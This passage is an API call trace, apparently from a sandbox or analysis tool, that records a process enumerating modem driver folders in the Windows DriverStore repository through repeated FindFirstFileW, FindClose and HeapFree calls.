[0028.547] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm6.inf_amd64_neutral_b1db427ce3d2a1b4\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a8d4529, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c6ca26, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c6ca26, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.548] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.548] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdf56f.inf_amd64_neutral_26a79521b746fc31\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a992c0a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c92b87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c92b87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.548] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.548] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdgitn.inf_amd64_neutral_09132735f1063a47\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aa2b18c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cb8ce7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cb8ce7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.549] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.549] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdp2.inf_amd64_neutral_ab710894455d7b9a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aac370d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cdee47, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cdee47, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.549] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.549] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdsi.inf_amd64_neutral_e77f438012239042\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ac404cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67d2b108, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67d2b108, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.550] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.550] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdyna.inf_amd64_neutral_7e4d690d07ee94c1\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4adbd292, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67de97e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67de97e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.550] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.550] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeiger.inf_amd64_neutral_492d4e047d14bde9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ae7b974, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67e5bc0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67e5bc0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.551] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.551] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmelsa.inf_amd64_neutral_374f9d31af832d6b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4af86315, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ea7eca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ea7eca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.555] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.555] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric.inf_amd64_neutral_27c5b45728cc9ed0\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b090cb7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6817b8f0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6817b8f0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.556] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.556] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.556] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric2.inf_amd64_neutral_a0575ec9ce5c7de9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b129238, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681a1a50, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681a1a50, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.556] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.556] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.556] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmetech.inf_amd64_neutral_230358eeb58f0b3b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b20da7a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681c7bb0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681c7bb0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.557] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.557] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmfj2.inf_amd64_neutral_9c9eb67d406a1632\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b2cc15b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681edd10, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681edd10, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.557] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.557] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgatew.inf_amd64_neutral_84eee4cc19fd00dc\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b3d6afd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68213e71, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68213e71, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.558] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.558] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgcs.inf_amd64_neutral_aafcd45e4e890862\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b4bb33f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68260131, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68260131, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.558] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.558] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgen.inf_amd64_neutral_7a967d06d569b1e4\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b59fb81, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68286292, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68286292, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.559] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.559] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl001.inf_amd64_neutral_9209e816461a1a73\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47580a6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6610ccf4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6610ccf4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.559] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.559] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl002.inf_amd64_neutral_e204d4267d752eb7\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4768b40c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66158fb4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66158fb4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.560] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.560] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl003.inf_amd64_neutral_4c78da9e48068043\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4776fc4e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x661a5275, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x661a5275, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.560] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.561] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl004.inf_amd64_neutral_1874f16002601f78\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47e6dcfb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6642c9da, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6642c9da, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.561] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.561] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl005.inf_amd64_neutral_8b56291bfd2a4061\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48356a64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66857061, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66857061, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.562] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.562] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl006.inf_amd64_neutral_e5693eb731048022\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48487566, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x668a3322, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x668a3322, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.562] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.562] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl007.inf_amd64_neutral_935cd017fcb965ee\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485de1c9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6693b8a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6693b8a3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.563] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.563] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl008.inf_amd64_neutral_d225e15af1a594cd\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x486e8b6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66987b63, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66987b63, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.563] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.563] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl009.inf_amd64_neutral_bed6224f27f5c478\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4881966d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669f9f84, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x669f9f84, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.563] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.564] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl010.inf_amd64_neutral_46f466c9e68abb4a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489702cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66a6c3a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66a6c3a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.564] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.564] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgsm.inf_amd64_neutral_dd3fbd8c64c7c87d\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b6843c2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x682f86b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x682f86b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.564] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.565] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhaeu.inf_amd64_neutral_6611a858035bf482\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b71c943, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6831e813, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6831e813, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.565] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.565] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhandy.inf_amd64_neutral_386661b46df6da3f\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b7db025, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6836aad3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6836aad3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.565] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.566] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhay2.inf_amd64_neutral_ff250f861d941dd8\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b8bf866, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x683b6d94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x683b6d94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.566] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.566] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhayes.inf_amd64_neutral_507db5d34d7acddc\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b9f0369, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68618398, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68618398, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.570] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.570] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdminfot.inf_amd64_neutral_fc6bcd80e9e6a3c3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bad4baa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68664659, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68664659, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.570] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.570] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.570] FindFirstFileW (in: 